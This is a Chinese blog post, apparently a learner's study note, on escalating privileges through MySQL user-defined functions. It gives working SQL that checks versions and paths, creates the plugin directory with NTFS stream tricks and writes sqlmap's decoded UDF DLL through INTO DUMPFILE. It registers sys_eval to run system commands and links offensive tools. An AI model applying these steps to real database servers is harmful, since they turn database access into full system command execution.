UDF提权

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量767 收藏 2
点赞数
分类专栏: 提权部分
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/101949597
版权

0x00 简介

看到了一些文章,有MySQL的udf提权,也有MSSQL的udf提权,这里以MySQL为例

udf是什么?

udf = "user defined function",即用户自定义函数

是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()

如果mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录

udf在mysql5.1以后的版本中,存在于"mysql/lib/plugin"目录下,文件后缀为".dll",常用c语言编写

提权条件

  1. 掌握mysql数据库的账户,从拥有对mysql的insert和delete权限,以创建和抛弃函数
  2. 拥有可以将udf.dll写入相应目录的权限(secure_file_priv =)

sqlmap中的udf文件定义的函数

到目前为止,对dll文件的理解是两个字,懵逼

sqlmap里是有udf.dll文件的,就在sqlmap\data\udf\mysql\windows\32目录下,里面有32位和64位,注意:这里的位数是mysql的位数,并不是对方系统的位数 

 

如何使用udf?

那如何使用udf文件呢? 

假设我的udf文件名为‘udf.dll’,存放在Mysql根目录(通过select @@basedir可知)的‘lib/plugin’目录下

在udf中,我定义了名为sys_eval的mysql函数,可以执行系统任意命令

如果我现在就打开mysql命令行,使用select sys_eval(‘dir‘);的话,系统会返回sys_eval()函数未定义

因为我们仅仅是把‘udf.dll’放到了某个文件夹里,并没有引入

类似于面向对象编程时引入包一样,如果没有引入包,那么这个包里的类你是用不了的

所以,我们应该把‘udf.dll’中的自定义函数引入进来

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

只有两个变量,一个是function_name(函数名),我们想引入的函数是sys_eval

还有一个变量是shared_library_name(共享包名称),即"udf.dll"

至此我们已经引入了sys_eval函数,下面就是使用了

0x01 复现

提权中用到的查询语句

SELECT version(); #查询数据库版本

SELECT @@basedir; #查询MySQL的安装目录

SELECT user();  #查询当前用户

SHOW VARIABLES LIKE '%plugins%';  #查找是否有plugins目录

show variables like '%compile%'; #查看数据库位数

至于各个大佬们用到的ads数据流,我是没有实验成功,不过这里还是放出来语句,万一以后有成功的呢

select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';
select 'xxx' into outfile 'D:\\mysql\\lib\\plugin::$INDEX_ALLOCATION';

在这里我只能手动创建了,也是相当于获得webshell的情况下的提权

接下来,我们可以直接通过webshell把udf文件直接上传到相关目录

注意:sqlmap中的lib_mysqludf_sys.dll_文件时经过了异或编码的,我们需要进行解码,解码工具在sqlmap中,extra/cloak目录下的cloak.py就是

解码完成会生成如下文件

我们也可以执行sql命令,如下

select hex((select load_file('udf文件'))) into dumpfile '保存的路径\\1.txt';

CREATE TABLE udftmp (c blob); //新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。
INSERT INTO udftmp values(unhex(‘udf文件的16进制格式‘)); //在udftmp中写入udf文件内容
SELECT c FROM udftmp INTO DUMPFILE 'E:\\PHPStudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll'; //将udf文件内容传入新建的udf文件中,路径根据自己的@@basedir修改

 

接下来导入我们需要的函数

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

0x02 工具

暗月工具

下载地址:https://pan.baidu.com/s/1EoGKX6bksOCFGgonFvfgYw  提取码:8ng0

个人感觉这个工具依然需要在plugin文件夹存在的前提下

打开工具页面如下:

导出udf文件

接下来直接执行命令即可

其他提权工具

可以进行多种提权

下载地址:https://github.com/v5est0r/Python_FuckMySQL

秋水sir
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
udf提权
qq_44881113的博客
07-19 3781
udf 利用udf提权 UDF为User Defined Function用户自定义函数,也就是支持用户自定义函数的功能。这里的自定义函数要以dll形式写成mysql的插件,提供给mysql来使用。也就是说我们可以通过编写dll文件来实现我们需要的功能,利用UDF提权需要知道root账户的密码 文件末为.so,则为linux系统,如果是win,则后缀为dll 开始提权 1 根据数据库版本选择上传udf.dll的位置 select version(); #查看版本 如果版本号大于5.1.4 上传
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
Mysql之UDF提权
热门推荐
good good study
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 1096
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
渗透测试:数据库UDF提权(linux)
qq_63442530的博客
04-01 1732
UDF:User Defined Function 用户自定义函数,MySQL数据库的初衷是用于方便用户进行自定义函数,方便查询一些复杂的数据,同时也有可能被攻击者利用,使用udf进行提权提权原理:攻击者通过编写,能调用cmd或者shell的共享库文件(window为.dll,linux为.so),并且导入到一个指定的文件夹目录下,在数据库中通过导入的共享库文件创建自定义函数,该自定义函数功能依照于共享库文件的功能,从而在数据库中调用该自定义函数能够使用系统命令。
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
udf提权PHP代码
10-30
udf提权PHP代码
udf 提权用的
05-28
udf 提权用的
MYSQL高版本低版本UDF提权工具
06-20
UDF提权是安全领域中一个关键的话题,特别是在数据库管理、安全审计以及渗透测试中。 UDF(User Defined Function)的原理是,MySQL允许用户编写C语言的库,并将其加载到服务器中,作为新的内置函数使用。这些函数...
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2714
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
【数据库提权】MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1998
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3863
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
数据库提权--UDF提权(MYSQL)
qq_45936617的博客
10-07 390
数据库提权的目的是通过已有的数据库权限获得操作系统的权限。UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数。用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,通过添加命令执行函数可以执行系统命令, 从而进行提权
UDF提权(linux)
m0_66299232的博客
05-23 1359
secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权。大概就是将程序进行gcc编译,然后再登录mysql进行创建一个表,插入.so文件,创建自定义函数进行越权操作。#secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权。#secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权
Mysql提权方法总结系列-UDF提权
kracer的博客
02-27 2609
0x01 简介 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。UDF官方介绍以及其函数定义请参考链接。 0x01 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权。 1、条件判断 ① ...
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值